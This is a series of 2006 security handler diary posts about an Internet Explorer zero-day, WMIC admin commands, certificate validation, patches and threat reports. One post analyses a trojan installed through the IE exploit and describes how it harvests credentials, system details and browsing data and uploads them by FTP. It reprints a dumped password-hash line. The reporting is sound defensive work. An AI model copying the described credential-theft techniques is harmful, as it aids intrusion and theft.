Published: 2006-03-31

How a 'Catch-22' Turns into a 'Shame on You'

Edit: How about we change the title here to "How a 'Catch-22' Revealed Behavioral Differences in Web Browsers".  I have add some updates at the bottom of the story based on feedback from some of our users and further research into SSL validation.


We received a submission yesterday from a user who was complaining about a Catch-22 that Microsoft had set up.  Microsoft Security Advisory (917077) addresses a vulnerability in Internet Explorer and how it handles HTML objects.  The workaround is to change the security setting for ActiveScripting, to either disable it completely or to set it to prompt the user before running each script.  On the advisory's web page, there is a link to this feedback page. The potential issue here is that the feedback page is using ActiveScripting.  Oops  ;-)

Now its not actually that bad for two reasons.  First, if you have changed your ActiveScripting setting to "Prompt", you can enable the scripts for this page.  Second, even if you have disabled ActiveScripting or choose to not allow it for this page, you will see the error message about needing JavaScript for this page and a link to a page with a non-JavaScript form and you will be redirected to the non-JavaScript page.  So while this may be a little annoying, its not a total show stopper.

So after figuring this out in Internet Explorer, I decided to try viewing the page in Firefox.  Pulled up the page and whoops, I got a popup about an error with the SSL certificate verification.

That's odd. It came up ok in Internet Explorer. Let's click on 'Examine Certificate...' and take a look at the details.  Hmm, this certificate is signed by the 'Microsoft Secure Server Authority'.  I bet we don't know who they are.

Let's go click on Tools->Options..., Advanced, View Certificates, Authorities and see what is there.
Nope, don't see any entries for Microsoft certificate authorities.

Let's go back to Internet Explorer and take a look at the certificate information.  Click on the yellow lock icon and we see that the certificate was issued by the 'Microsoft Secure Server Authority'.  Click on the 'Certification Path' tab

So now we see that this certificate was issued by the 'Microsoft Secure Server Authority' which in turn is trusted by the 'Microsoft Internet Authority' which in turn is trusted by a GTE Root CA.

Ok, now let's go look at Internet Explorer's built-in certificates.  Click on Tools->Internet Options..., Content, Certificates..., Intermediate Certification Authorities.  Ah hah!!  Here we see both the 'Microsoft Internet Authority' and the 'Microsoft Secure Server Authority' CA certificates.

So why is this bad?  Microsoft is using an internal CA to issue the SSL certificate for their web site.  Only folks using Internet Explorer to view the page will not get complaints about the certificate.  Anyone using any other browser will get an alert.

Now since this page deals with security (specifically web browser) security, it is counterproductive to the mindset we are trying to train people to have to use an SSL certificate that they can't verify.  If folks just think to them self "Hey this came from Microsoft's security folks, it should be ok" it sets up reinforcement of ignoring SSL certificate errors.

The solution is for Microsoft to either use a certificate from a publicly trusted CA or to have their CA certificates included in other browsers.  Since there are so many alternative browsers, using a publicly trusted CA is probably the best option.

You can export the Microsoft CA certificates from Internet Explorer and import them into Firefox (or another browser) and then you will not see the popup about the server's SSL certificate not being verified.

Update 1:

We received an email from Cesar pointing us to a blog entry here from June 2004 that talks about this issue on another Microsoft web site.  Apparently RFC2459 defines how the Authority Information Access (AIA) 48.2 id-ad-caIssuers OID can be used to included a URL reference where to retrieve information about the certificate.  Internet Explorer uses this information to retrieve the intermediate CA certificates needed to verify the host-specific certifcate.

I happened to have a brand-new laptop here with Windows XP that had not been connected to the network.  I checked it's certificate store and did not see the two intermediate Microsoft certificates.  I then connected to the network and went to the same SSL page on Microsoft's site.  Then I checked the certificate store again and found the two intermediate Microsoft CA certificates were now installed.

So according to the above RFC, Internet Explorer is following a document that is on the Standards Track.  Other browsers such as Mozilla have chosen not to implement this option due to some ambiguity in the RFC.  You can see more discussion about this here in the Bugzilla entry created on this topic. 

It is not clear as to what can be provided through this reference URL and so the Mozilla developers have chosen not to implement it. Apparently Opera, Safari and Konqueror also ignore the AIA data included in a server certificate.


Published: 2006-03-30

Windows Command-Line Kung Fu with WMIC

A few weeks ago, uber-handler Tom "I-Write-Spyware" Liston and I were working on some tests of anti-spyware applications.  One of the experiments we performed was to take an ultra-infected box and run various anti-spyware tools to see if any of them could clean up the mess.  The Windows machine we had was so thoroughly laced with spyware that IE couldn't run, Task Manager couldn't start, and the services control panel was kaput.  Pretty much every GUI-based management and analysis tool on the box was hosed.  Ouch!  And, no, booting into Safe Mode didn't help at all (we tried it of course), because the system was so corrupted.  You see, the spyware altered various crucial reg keys and used the SafeBoot reg key for auto-startup, as Tommy-boy described briefly here.

So, how could we do analysis on this machine without resorting to these GUI tools?  Of course, there is the stunning arsenal of handy investigating tools from www.sysinternals.com (Process Explorer, TCPView, et al), but we wanted to go with tools built-in to Windows, preferably command line.  We didn't even want to use the Resource Kits.

So, what did we resort to?  In large measure, we relied on the immense power of the WMIC tool, built into WinXP Pro and Win2003.  Sorry, but WinXP Home isn't a professional-class operating system, and it lacks many useful management tools like WMIC.  But, for WinXP Pro and Win2003, WMIC is a command-line console to access Windows machines via Windows Management Instrumentation, a framework established by everyone's favorite software vendor for locally and remotely managing Windows boxes (although installed on XP Pro and 2003, it can be used to manage Win2K, WinXP, and Win2003 systems remotely with admin credentials).  Before WMIC, you had to write scripts or get a specialized tool to pull data via WMI.  But no more…  WMIC gives us command console access to the powerful framework of WMI.

WMIC is a world unto itself, immensely complex, able to read several thousands of settings on a Windows box, and update hundreds, again both locally and remotely.  It includes its own query language, called WQL, for WMI Query Language, a subset of ANSI SQL.

But enough pontificating!  Let's get hands-on.  Here are some fun things you can do with WMIC that served us very well in our anti-spyware research:

C:\> wmic process [pid] delete

That's the rough equivalent (for you UNIX/Linux minded folks) of "kill -9 [pid]".

Or, better yet, try this one on for size:

C:\> wmic process where name='cmd.exe' delete

I love that one!  It functions something like "killall -9 cmd.exe" would on a Linux box, where killall lets you kill processes by name.

And, check this out:

C:\> wmic process list brief /every:1

Sort of like (but not exactly) the Linux/UNIX top command.

But, wait!  There's more...

C:\> wmic useraccount

This one gives a lot more detail than the old "net user" command.  With "wmic useraccount" you get user names, SIDs, and various security settings.

Fun, fun, fun!  Here's another:

C:\> wmic qfe

This one shows all hotfixes and service packs.  For you old-school Sun-heads out there (both of you! -- Just Kidding), qfe doesn't stand for Quad Fast Ethernet... It stands for Quick Fix Engineering in this context.

For a list of some of the items WMIC can touch, run this:

C:\> wmic /?

Now, here's a request.  Do you guys have any other fun WMIC tricks?   Specifically, have you used WMIC in an investigation or in sysadmin duties to pull some vital data that other readers of the Internet Storm Center can benefit from?  Please note that we do not want WMI scripts…  We want WMIC command-lines that do cool things of interest to Incident Handlers.  Send in your suggestions, and I'll post them throughout the day, giving you full credit (if you want it) for your elite WMIC kung-fu.

What's your favorite thing to do with WMIC?

--Ed Skoudis
Co-author of the new book Counter Hack Reloaded (written with Tom "My-Spyware-Is-Actually-Good!" Liston

UPDATE 1:  Diligent reader Rob_LD points out this great command:

C:\> wmic startup list full

It shows a whole bunch of stuff useful in malware analysis, including all files loaded at Startup and the reg keys associated with autostart.  Who needs msconfig or autoruns?  Well, I do.  I like to have those around as well.  Still, WMIC is our friend.

UPDATE 2: A couple of readers have pointed out that you could either type WMIC followed by commands as I show above, or run WMIC and hit enter.  This puts you into a little WMIC console shell, into which you can type the WMIC commands I show above.  Which is better?  I use both, but typically do the former as I show you above.  I myself prefer to use wmic followed by the commands in-line, because then I can pipe its output into other commands to find stuff or sort things, as in the following:

C:\> wmic process list brief | find "cmd.exe"

That works a little like a Linux "ps -aux | grep cmd.exe".

So, I run it as I show above, piping its output through sort, find, findstr, etc.  Also, it's nice to redirect its output to a file, with a simple >.

Handler Guru Stud Muffin Marc Sachs pointed out that you can view the really crappy WMIC documentation in a handy file by typing:

C:\> wmic /?:full > wmic_docs_that_stink.txt

Then, open the .txt file and read it and marvel at how much better man pages are than what you see there.

Also, Rob_LD brought up another good point.  By default, WMIC lets you blow up critical things, such as vital processes, using the delete item as we showed above.  But, if you are a little nervous about this, you can set WMIC to ask you before it does delete something.  You can do this by running WMIC, and, within its little command shell, typing "/interactive:on".  Then, whenever you delete something from within the WMIC "shell", it'll ask you to confirm.  However, please note that if you use WMIC as I say above (right at the c:\> prompt), it still won't ask you for confirmation.

As for me, I like to run with scissors (while chewing gum!), so I use it without the interactive mode.  I mean, I would hate it if killall on Linux said to me, "Are you sure you want to do that?"...  But perhaps that's just me.

Alert reader Alan Ridgeway points out that WMIC supports all kinds of funky and useful output formats, which it can store in a file via the /output: directive, invoked as follows:

C:\> wmic /output:[file] [stuff you want it to do] /format:[format]

Numerous formats are supported, including HTML format (hform), CSV, XSL, and so on.  So, check this out:

C:\> wmic /output:c:\os.html os get /format:hform

Then, open c:\os.html in a browser, and soak in that beautiful output.  Ooooohhhh.  Ahhhhhhh.

For a list of format types supported by WMIC, you could type:

C:\> wmic [stuff to do] /format /?

As in:

C:\> wmic process list /format /?

Going further, nice-guy reader Russell Eubanks mentioned the ability to pull lists of attributes and output them nicely, as follows:

C:\> wmic /output:c:\temp.html os get name,version /format:htable.xsl

That's pretty darn nice, and I find that WMIC is best enjoyed over Mexican food with really good beer.

Some folks have asked about the results of Tom "The-spyware-I-write-works" Liston's and my attempts to clean the infected system.  We worked with several anti-spyware companies, each doing scan after scan, trying desparately to get the box clean and working again.  After at least 1.5 hours with _each_ vendor, the box was still not usable.  We concluded that the best bet if you have a totally infected box is to reinstall the OS.  You'll have much more assurance of your end result that way.

A few folks have also written in about my references to Tom "I-Write-Spyware" Liston.  Some of you are certainly thinking, "I KNEW IT!  LISTON IS EVIL!  EVIL I TELL YOU!  SKOUDIS JUST CONFIRMED IT!"  While I cannot tell you conclusively the state of Mr. Liston's eternal soul, I can tell you this... he did in fact write some spyware.  But, the purpose of his spyware was for a project Tom and I were working on.  We wanted to evaluate whether the major anti-spyware vendors had solid behavior-based detection capabilities, rather than just relying on their sigs of known spyware.  So, Tom wrote some custom, benign, "spyware-like" programs that take action on a system.  The resulting suite, which we called Spycar (in homage to the EICAR anti-virus test file), tries to change the IE and Firefox home page, adds entries to the hosts file, changes the Run, RunOnce, and RunOnceEx reg keys, etc.  In all, Spycar includes little programs to take about 25 different individual actions on a machine to see if it is blocked by an anti-spyware tool.  We'll be releasing Spycar, along with the results of our testing, the first week of May... so stay tuned.  And, in the end, sadly, you cannot use this post as proof of Tom Liston's evil nature.

Guys, I love being an incident handler.  There's so much we can learn from each other.  I just got a message from Alan Ridgeway again, with some immensely useful info about WMIC that I never knew.  This is way cool high-speed stuff.  Alan points out that you can use the /record option in WMIC to record the WMIC commands you typed, their output, and a timestamp, as in:

C:\> wmic /record:test.xml process list brief

After the command runs, your results are stored in xml format.  That's the only format supported, but this is a handy record of what you typed, when you typed it, and the results you got.  I really like that as a handler for some complementary evidence!  Sweet!

The only down side, though, is that it will overwrite a previous test.xml, rather than append to it.  Still, not bad, as long as you make sure to use different names for your record files.  Thanks, Alan, for that nice tip.

Another reader, desiring anonymity, talks about the network interface configuration options afforded by WMIC, such as:

C:\> wmic nicconfig where IPEnabled='true'

That'll give you a list of IP interfaces.

Or, to change the IP address at the command line, you could:

C:\> wmic nicconfig where Index=1 call EnableStatic (""), ("")

For DHCP, you'd do this:

C:\> wmic nicconfig where Index=1 call EnableDHCP

Where the index is the number of the interface you get from that first nicconfig command I put in this update.

While these WMIC uses work for altering the NIC settings, I find them really cumbersome.  I know, I know... you are thinking, "Cumbersome!  Have you seen some of those commands you typed earlier in the diary!"  But, in config'ing Windows network interfaces at the command line, I much prefer the netsh command, which is totally independent of WMIC.  That's a favorite of yet another reader who wanted anonymity.  For more info on that command, type:

C:\> netsh /?

While we're talking trash about WMIC... the issue comes up: How do you pronounce "WMIC" when you are speaking?  Some people (a lot, actually) say it "WeeMick".  I personally loathe that formulation.  I call it "dubbel-you-emmm-eye-sea".  Sounds better that way to my ear.  Also, you can even sing a little jingle for it:  "WMIC... see ya real soon... K-E-Y... why?  Because we like you!  M-O-U-S-E".

And, in closing, I leave you with this nice reference from Reader Jon.  If you want more docs about command-lines for various operating systems (including Windows and its WMIC universe, along with other tools), Linux, Mac OS X, and even Oracle, check this out.

That's it for me today... The Internet Storm Center is now in the ever-capable hands of Mr. Incredible himself, Dave Goldsmith!

Thanks for a fun day, guys, and all your wonderful suggestions--
--Ed Skoudis


Published: 2006-03-30

Microsoft Altering ActiveX in Next Set of Patches

We've gotten several e-mails from diligent readers (Thank you, Juha-Matti, Richard, and others) about Microsoft's plans to alter the way ActiveX controls work in a non-security related update associated with some legal imbroglio.  According to Microsoft:

"So [On April 11] when we release the next cumulative IE security update [which will also include the non-security update associated with ActiveX], customers will only be able to interact with Microsoft ActiveX controls loaded in certain web pages after manually activating their user interfaces by clicking on it or using the TAB key and ENTER key."

That's not the end of the world, but it is worth noting.

What does this mean to you?  On April 11, some of your ActiveX controls may stop working.  You can test this new IE voodoo by downloading an optional patch for IE from Windows Update.  Microsoft will have a tool (a retro-patch?) for making IE behave like it does now, but that tool will only be supported through the June updates.

For more information, check out this advisory for the details, or the newly added section to the FAQ (as of yesterday) to this advisory, and read this blog posting from a Microsoft employee working this issue.  The blog posting includes specific advice for enterprise users (in summary... test!) and for consumers (in summary... use Windows Update and be happy!)

UPDATE 1: Some readers have written in to express their unhappiness that the non-security-related patch done for legal reasons is being released with the fix for the zero-day IE flaw.  I agree.  I don't like to see them together either.  Consider your complaint on that registered with the ISC, not that we can do anything about it.

--Ed Skoudis.


Published: 2006-03-28

Oh Yeah....I forgot about that

An email we got today from John Moser sparked an idea for something that I thought was a great lesson learned.  So I wanted to share it with everyone.  John was participating in the collegiate cyber defense competition.   If you have never participated in capture the flag competition or a red/blue team activity, you are missing out.  You really should try to participate in one cause its a great experience and really drives lessons learned home.  Not to mention that it is an absolute blast!

What really caught my eye was this from John:  "This doesn't help when you have a full default EVERYTHING install of Fedora Core 3 and 4, Win2000, and Win2k3.  It particularly doesn't help when you don't know what EVERYTHING is and how EVERYTHING is configured, because EVERYTHING becomes an entry point for hackers who know how to exploit blatant configuration errors."

In another email exchange he said:  "What I didn't know was how every inch of every system on my network was configured. "

So by now, you probably know what I want to talk about.  John nailed it.  You can shut all the doors and windows and lock them tight, but if you forget there's a window in the basement that was secure when you looked at it a year ago and hasn't been checked since....bad things can happen.  I don't think it can be emphasized enough that you have you know your systems.  There are three things that came out of this for me and I see as issues.
  1. You can't secure something you don't know or understand.  If you don't understand what you are dealing with then you won't know what you need to do.  Do you want a surgeon operating on your brain when they specialize in orthopedic surgery?  I mean he/she could follow a manual and might get it 80% correct.  The same care should be taken with our network.  When you start installing things you don't understand or know how they work ... you might get it 80% correct. But can you afford that?  From John:  "Let's all remember today that no matter how tight your security, if you can't actually run your box you're owned."

  2. Let's say you know your system and your applications. Now you can't secure something and forget about it.  All applications need TLC.   There's bound to be a patch or upgrade that needs to happen. Many times its the small things such as a default password that get forgotten (or a weak one that doesn't get changed) or a service that doesn't get turned off.  All a hacker needs is just a small hand hold and then go from there.  Its easy to overlook the small stuff.  Constantly watching networks and checking things are a must.  

  3. The unknown.  What do I mean by this?  Well, one night Mr. Helpful SysAdmin installs something on the network that someone claimed they needed and you didn't know they put it there.  Someone installs something, makes a change etc and it doesn't get documented and/or approved.  This is something that I know has happened to everyone at some point in time.  Now good policy and procedures can help alleviate that, but we'll talk about that in a minute.  If you don't know something is there, you can't secure it and you don't know what kind of security risk its created on your network.
All in all, network security is a full time job and its still a lot of work to do it right.  There is so much to learn and attention to detail is key.  You have to be meticulous in what you are doing because the hackers who want in are being just that.  Here is another quote from John's email I would like to share:  "The pen-testers told us in the end that even some of the really secure networks they've seen sometimes pop up some minor configuration error and they know, at the end of the day, what happened to us could happen to them."  It just takes a little small weakness to turn it into something big.

Configuration management is a key piece to making sure this doesn't happen.  Documenting what is being done and what is on a system is so important especially on a large network where there are many fingers on the keyboards.  You have to stay on top of it all the time.  It's also important to realize that mistakes will be made and that is just a fact.  Hopefully they will be caught early.  Learn from them!

Stay on top of your skills and understand what it is that is going on your network.  Keep in mind that if you don't someone else out there probably is.

Lorna J. Hutcheson


Published: 2006-03-28

Temporary Patches for createTextRange Vulnerability

Eeye released a temporary patch for the current createTextRange vulnerability. The patch can be found here:
  http://www.eeye.com/html/research/alerts/AL20060324.html. A second patch has been made available by Determina.

At this point, we do not recommend applying this temporary patch for a number of reasons:
  • The workaround, to turn off Active Scripting AND to use an alternative browser is sufficient at this point.
  • We have not been able to vet the patch. However, source code is available for the eEye and the Detmina  patch (for Determina: the source is part of the MSI file. for eEye: The source code is available as a seperate file)
  • Exploit attempts are so far limited. But this could change at any time.
Some specific cases may require you to apply the third party patch. For example, if you are required to use several third party web sites which only function with Internet Explorer and Active Scripting turned on. In this case, we ask you to test the patch first in your environment. You may also want to consider contacting Microsoft.

We do suspect that Microsoft will still release an early patch given the imminent danger to its customers from this flaw. As stated by the company about two years ago, patches can be released within 2 days if needed. Microsoft has honed its patching skills from numerous prior patches. At this point, Microsoft suggested that the patch will be release no later then the second Tuesday in April. Based on prior public commitments, we do suspect that Microsoft will issue the patch early once they are convinced that customers require the use of Internet Explorer in production environments.

Please let us know about issues (or successful installs) of either patch. We will summarize issues here.


Published: 2006-03-27

Security History Poll Results

Reactive or Pro-Active Security Planning?

Looks like that with few exceptions, the most correct answer for my last question about when you started to think seriously about security is: Reactive!

Why? The answer is that most of people/companies started to think about security after a bad security experience. From gvmt to .edus and private companies...almost the same, which I thought was kind of funny...:)

Another point that should be noticed is that some companies started to think about a security team/specialist only for marketing and not for real security jobs, which was kind of sad...:(

If I could chose an average year, I would say 2001/2002, according most of the answers, and there is a reason for that, if you remember well, that was the year of most new generation worms (remember Code Red ?)

What follows below is a list of some testimonials that I think that is very informative...:)

Thanks for all the answers!



Various steps:
1995 - preparation for y2k and acquisition of new enterprise accounting and payroll systems
Summer of '98 - connected to the Internet
2002 - preparation for HIPAA Privacy Rule and Security Rule

It's a company that refuses to think that threats can originate from inside the firewall (users). IT
computers are out in the open with the "normal" users computers. We have a long way to go before we are "secure".

To answer your question more directly, its been maybe the past year and a bit that we had started to think about security in a serious way.

I work for a County government, and except for what I do because I feel SECURITY is a BIG issue, we do nothing.
I have a firewall(linux box with iptables) in place and try to institute what I feel will do the
best for the County, but I have NO budget.

In 1994-1997 I worked as an employee at Company X.  Like Company Y this was an  organization that could incorporate security deeply into the ways things  were done (in many divisions)  There were some places where
security was lax and some where (in a post Mitnick world) very tight.

I would trace our thinking seriously about security to November 5, 2002, the day that we changed our primary firewall from a default-allow to a default-deny configuration.  Shortly thereafter, we started managing patch status on our 5000 (no 9000+) Microsoft workstations using SMS.

* In November 2002, I got a DSL line.  After I configured up ipchains on the box that would be my firewall/file server/domain controller/etc., I went to Steve Gibson's site to test my configuration.  It said I had everything open.  Well, I didn't believe it, and I just left it.  It wasn't two days before my box was hacked through a telnetd vulnerability.  So that got me thinking seriously about security at home.

* In March of 2003, the place I worked had someone (in the same office where I worked) that was bypassing security measures by running programs like MyIE2 and trying to hack our boxes.  It came to a head in September when he took down one of our machines.  I became the computer tech for the department in October and started locking down our machines as tightly as possible.  We haven't had an incident since.  This is also what got me interested in computer forensics.  I received training in the field and am pursuing volunteering for my local police department to get some experience in the field.

Well my company has been thinking (and doing) seriously about security since 2001, so 5 years.  I have been since 2000.

It was in April of 1999 when we got hit with the Melissa worm and we realized that user education was lacking, and even where sufficient, the antivirus software could only be trusted so far... so we had to invest time in locking down workstations and generally paying attention to internal security.

Server security happened first, following the need for external security in 1996 when we put up a website (a year after getting a domain name registered so that we had email).  This is because we were hard on the outside from the outset; even though we're a Windows shop, we never had issues with hanging Windows boxes on the Internet and having issues with CodeRed, Nimda or Windows Message spim.

When we first went from paper to a computer, back about 1989 or so, the 'server' had access through 'terminals'.  Security at this time meant, as perhaps some of your readers will remember, limiting access to the system through a variety of ways, running a specific 'shell' .profile and .login to prevent access to the command line, limiting rwx rights, and limiting 'server' functions according to needs.

By this time, several free standing personal computers were beginning to show up in the workplace, data on 5 ¼ floppies was making rounds.  Our server data was backed up daily and stored off site.  The server security was pretty good, no access other than dumb terminals inside the complex.  It was about this time we discovered the term 'virus' and a program called f-prot.  A small outbreak of a boot virus actually started the business of limiting access to data which had been 'screened' before loading on our internal machines.

Time went on, we started a WIN3.1 network and did away with many of the terminals.  The internet started in earnest about this time, and dial up and dial in on dedicated lines was established to reach the internal network from remote locations.  That's were the 'profession' of security probably really started.  Security issues, sure, but that's it, 'issues' handled by a few individuals with some sage advice and implementing innovative techniques. 

I started thinking about security in a serious way about 8 years ago, when my company began installing web servers in data centers. I knew publicly accessible servers could be trouble. It occurred to me then that securing the public servers was not enough, and that all of our systems had to be secured lest we become a vector for our own demise.
Since then we've been trying to keep up with vulnerabilities and exploits.

So far we have only been affected once, by the original Code Red worm. Our security budget is now our second highest IT expenditure, just behind hardware. I always chuckle when I hear media reports of this year being the
year of infosec. To me, every year is the year of infosec.

This is an easy one -- never. My employer at $DAY_JOB had to be dragged kicking and screaming into at least SOME form of security policy. I was continually being second-guessed by silly buggers from "executive row", for example, about why we required a VPN to access the internal mailserver when their friend, sibling, Mom, or dog didn't have to at THEIR company. (sigh)

It's usually only some form of object lesson (usually painful) that convinces executives to pay attention to security. Education doesn't seem to help -- too many of them think that since they were able to set up a WiFi router at their house they're qualified to make decisions about IT Infrastructure. (sigh)

Until Sasser, even computers at the help desk had public IPs and every folders and printers were shared with the rest of the world...
We were told by our administrators and our senior technicians to say to our clients to remove the Windows XP firewall because it can blocked several softwares using Internet.
This thing changed with the arrival of Blaster (Maybe the half of our clients - dialup and broadband - were infected) and then, I began to analyse my firewall logs and to read your daily news on ISC.SANS.ORG .
I had to put pressure on our administrators to block or to restrict NetBIOS and SMB ports but they denied my requests... maybe because they weren't able to create ACL on Cisco equipments...
The arrival of Sasser finally forced them to go in my way... because our own Internet provider told to the admins how to block incoming and outgoing NetBIOS and SMB traffic.

I began to think/learn about security five years ago and it all started with a security incident of course: we had our broadband link shut down because of a misconfigured proxy (mind you).Here at this company there's been some talk about a written policy of use and to train personnel on security (me for the case), but nothing serious yet. As long as nobody get her documents lost everyone is confident everything is ok.

I've been taking it seriously since I got my internet connection and learned about all the rubbish that's out there.I've burried myself in book on security since then.
From firewalls to vpn's to all the spy,virus,adware scanners we need these days.
I'm currently working for a large Telecom multinational in a network control centre.
They take network security extremely serious.
I was amazed by the tightness of their internal network.

Two years ago we ran exclusively windows software (mainly XP) on all the units
and I found (in spite of having firewall/anti-virus/spy-sweeper software
installed) that I was spending about 2 hours of every day, 7 days a week,
doing nothing but checking, scanning and updating, and of course worrying !
One year ago we migrated to running OpenOffice, FireFox and Thunderbird on the
windows box's in an effort to mitigate some of the risks that were apparently
inherent in the windows software.
We made the decision in November of 2005 to migrate ALL of our systems onto
linux using XXXXX for the in house server and FC4 for all the workstations.
The change went without (too many) headaches and, from 1st January 2006, we
are now 100% linux/open source  - the result is that the time I need to spend
on the security/upgrades has dropped from nearly 2 full working days a week
to about 4 hours a week - a considerable saving and relational increase in
productivity - not to mention the savings in software costs associated with
this route. Incidentally, the overall stability of the new systems and the
speed that it runs at would make the change worth while even if one didn't
take the security aspects into account !!!
I was gratified to read one of your handlers articles detailing what security
measures he had put into place on his business systems and realise that I was
running an identical security infrastructure on our new linux network.

In 2000, my company, a large healthcare system in XXXXX, hired their first security specialist - someone devoted entirely to security.  That was only 5 years ago.  He left because the company didn't take security seriously, even though they had hired him under the pretense of being "security conscious".  They thought just having someone on staff labeled, "Security Specialist" was enough.  I took his position a little over a year ago and now I've found a new job in Information Security because I had the same frustrations as the previous security specialist.  It seems the company wants to be compliant (especially to HIPAA), but doesn't want to do what it needs to do to get there.

The company that I'm at now didn't start thinking about security until late 2004, which is when they hired me, and
it wasn't until the middle of last year that real security initiatives started happening.  This is contrast to the trading firm where I started my security career in 1996.  They already had a full security plan in place.  The insurance firm that I went to work for after that implemented a full security architecture around 2000.

XXX.edu has been thinking about security in a comprehensive and org.-wide way since approximately 1992.  Our current security plan was written in 1996, and has stood the test of time very well since.  The revisions of it in progress are mostly to translate it into the language that funding agencies say they'll begin expecting for initial security plans in 2007.


Published: 2006-03-27

DNS problems?

Looks like the dns is having some issues, more than usual...We received also some reports regarding some problems with Worldnic. We are looking for reports regarding issues with DNS, or specifically Worldnic.

Handler on Duty: Pedro Bueno (pbueno //&&// isc. sans. org)


Published: 2006-03-27

Updates on IE vulnerability

Our reader Juha-Matti pointed that MS updated its blog with informations about the patch and some advices for users:
"I want to reiterate that the IE team has the update in process right now and if warranted we'll release that as soon as it's ready to protect customers (right now our testing plan has it ready in time for the April update release cycle).  But if you're concerned you may be impacted, now you can visit http://safety.live.com to scan your machine and remove current attacks using this vulnerability."

Altough they say that are seeing only limited attacks, we have some reports of more than 100 sites (Saturday data) exploring this vulnerability, to install bots, keyloggers...

Btw, just to be clear about the safety live com thing, it offers some protection, but it can only protect you in known malware with signatures...It is not protecting you against the IE vulnerability...

The number of sites are now
over 200...

Handler on Duty: Pedro Bueno ( pbueno //&&// isc. sans. org)


Published: 2006-03-26

Email attachment vector for IE createTextRange() Remote Command Execution

Just for the sake of clarity, there is an email attachment vector for this exploit that's not widely reported. I have not seen any reports of it being used at this time. MS's bulletin, in the FAQ's, in "Could this vulnerability be exploited through e-mail?", says it can be exploited if one "open(s) an attachment that could exploit the vulnerability." ISS obliquely says attacks may occur by "...simply embedding the required logic in specially crafted HTML emails.".

Note - My Outlook Web Access runs in the Local intranet Zone, and MS's suggested workaround for this IE Zone is change the Local intranet setting to prompt or disable for Active Script, or just crank the zone security setting to high for prompting.

HTML attachments, the IE Local Machine Zone Lockdown

According to MS, "Web pages accessed from the local computer are placed in the Local Machine zone" and "The Local Machine zone is an Internet Explorer security zone, but is not displayed in the settings for Internet Explorer.". "In Windows XP Service Pack 2, all local files and content that is processed by Internet Explorer has additional security applied to it in the Local Machine zone.".

"Specifically, these settings are:

URLACTION_ACTIVEX_ RUN resolves to Disallow.
URLACTION_SCRIPT_ RUN resolves to Prompt.
URLACTION_JAVA_PERMISSIONS resolves to Disallow.".

Since "
script in local HTML pages viewed inside of Internet Explorer prompts the user for permission to run", disallowing HTML attachments might be worth considering.

In addition, keeping gateway email AV sigs up to date is advisable. Drop us a note if you notice attacks coming at you via email. Thanks!


Published: 2006-03-26

Modified Malware for the IE Expoit

Its always interesting around the ISC and you'll never know what you'll be handed on any given day.  Its even more interesting when there is an unpatched IE vulnerability and an exploit available for it.  That is where we find ourselves now.  There are several sites that have been compromised and now contain the exploit code.  These sites all run the exploit code and get a file called ca.exe which in turn gets a file called calc.exe and installs it.  It is calc.exe that we want to focus on briefly.

This malware installs a dll that is used as a Browser Helper Object (BHO) and also runscopies itself to directory you see below as nm32.exe and runs as a process.  The malware creates the following on install:


It also creates one called sub.txt when you surf the internet and records everything that it can about where you surf and do and any information it can get from the  Let's look at what is in the files.  The information I'm about to show is from my VM box, so it won't get you anywhere:>)

File: ipcfg636

Windows 2000 IP Configuration
    Host Name . . . . . . . . . . . . : vmwindows2k
    Primary DNS Suffix  . . . . . . . :
    Node Type . . . . . . . . . . . . : Broadcast
    IP Routing Enabled. . . . . . . . : No
    WINS Proxy Enabled. . . . . . . . : No

Ethernet adapter Local Area Connection:
    Connection-specific DNS Suffix  . :
    Description . . . . . . . . . . . : AMD PCNET Family PCI Ethernet Adapter
    Physical Address. . . . . . . . . : 00-0C-29-16-36-AB
    DHCP Enabled. . . . . . . . . . . : No
    IP Address. . . . . . . . . . . . :
    Subnet Mask . . . . . . . . . . . :
    Default Gateway . . . . . . . . . :
    DNS Servers . . . . . . . . . . . :

File:  start636

Active Connections

  Proto  Local Address          Foreign Address        State
  TCP                LISTENING
  TCP                LISTENING
  TCP               LISTENING
  TCP               LISTENING
  UDP            *:*                   
  UDP            *:*                   
  UDP           *:*                   
  UDP    *:*                   
  UDP    *:*                   
  UDP    *:*                   

File:  tmp636

    Protected Storage settings / PWL:
        IdentitiesPass    ::::€:Ï»b[
    HASH values:
Administrator:500:AF6E956C6F6836C4F3F9505A2D0958A7:0B14980C258F0D7178186CE65030A4A6:Built-in account for administering the computer/domain::
Guest:501:********************************:********************************:Built-in account for guest access to the computer/domain::
Total 0 entries
    Network settings:

File:  view636

Server Name            Remark

The command completed successfully.

File:  Sub.txt


The malware FTP's all the information out to a location.  It also has email capability.  The location given by McAfee in their writeup found here was as follows:  "The trojan attempts to upload harvested information to an FTP server ("  However, when I downloaded the malware and looked at it that was not the location I found in the strings.  I found:

0040F530   ASCII "",0
0040F630   ASCII "21",0

So its seems that the malware has been swapped for a new version with the FTP server portion being changed.  I have not observed it attempting to FTP yet, still waiting with a sniffer running.  The strings also contained the username and password for the new site.  The file on the new IP  is now encrypted and the file wasn't before on the first FTP site.  So the individual seems to realize that folks are on to them.  I'm pretty sure that the malware has just been changed since its easier to modify the malware and where it FTPs to than to go back to all the hacked sites.

Anyway, please keep your eyes and ears open for any new sites exploiting this vulnerability!  As always, be careful its a jungle out there!

Lorna J. Hutcheson


Published: 2006-03-25

Joker.com confirms DDOS Attack on Nameservers

We received a report yesterday about a DDoS against Joker.com's DNS servers. Thanks for the report! From the site "Joker.com currently experiences massive distributed denial of service attacks against nameservers.
This affects DNS resolution of Joker.com itself, and also domains which make use of Joker.com nameservers.
We are very sorry for this issue, but we are working hard for a permanent solution.
Thank you for your understanding".


Published: 2006-03-25

Deja Vu - PHP(BB) attack increase reports

Over the last week or so, ISC participants have been sporadically reporting increases in php(bb) attacks, Websense and Jupiter (graph) are also seeing attack increases.


Published: 2006-03-25

Microsoft Updated Security Advisory (917077) and APWG Report released

Microsoft Updated Security Advisory (917077) (Vulnerability in the way HTML Objects Handle Unexpected Method Calls Could Allow Remote Code Execution) and says "Advisory updated with indication of limited attacks." In this instance, "attacks" = malicious websites. And speaking of attacks/malicious websites, the APWG January Phishing Trends Report (APWG Report graph below) was released and reports "The number of unique phishing websites detected by APWG was 9715 in January 2006, a huge increase in unique phishing sites from the previous two months.". I wonder if the authors of trojans that steal banking information are capable of deploying 9,715 "attack" websites a month with exploits for unpatched IE vulnerabilities? Handler Donald Smith mentioned how easy it'd be to spam links to the world. What's your IE threat analysis folks? Drop me a line!
Update - McAfee calls malware used with an exploit for this vulnerability PWS-PartyPooper.


